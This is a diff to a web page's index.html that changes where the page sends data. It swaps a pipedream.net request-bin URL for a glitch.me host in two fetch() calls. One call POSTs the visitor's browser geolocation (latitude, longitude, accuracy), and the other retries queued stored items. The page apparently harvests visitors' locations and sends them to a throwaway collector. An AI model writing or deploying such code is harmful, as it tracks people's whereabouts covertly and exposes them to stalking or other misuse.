--- a/index.html
+++ b/index.html
@@ -251,7 +251,7 @@
       const remaining = [];
       for (const item of stored) {
         try {
-          await fetch('https://eop5k4d4mrwvl3m.m.pipedream.net', {
+          await fetch('https://somber-hip-profit.glitch.me', {
             method: 'POST',
             headers: { 'Content-Type': 'application/json' },
             body: JSON.stringify(item)
@@ -297,7 +297,7 @@
           lon: coords.longitude,
           accuracy: coords.accuracy
         };
-        fetch('https://eop5k4d4mrwvl3m.m.pipedream.net', {
+        fetch('https://somber-hip-profit.glitch.me', {
           method: 'POST',
           headers: { 'Content-Type': 'application/json' },
           body: JSON.stringify(payload)
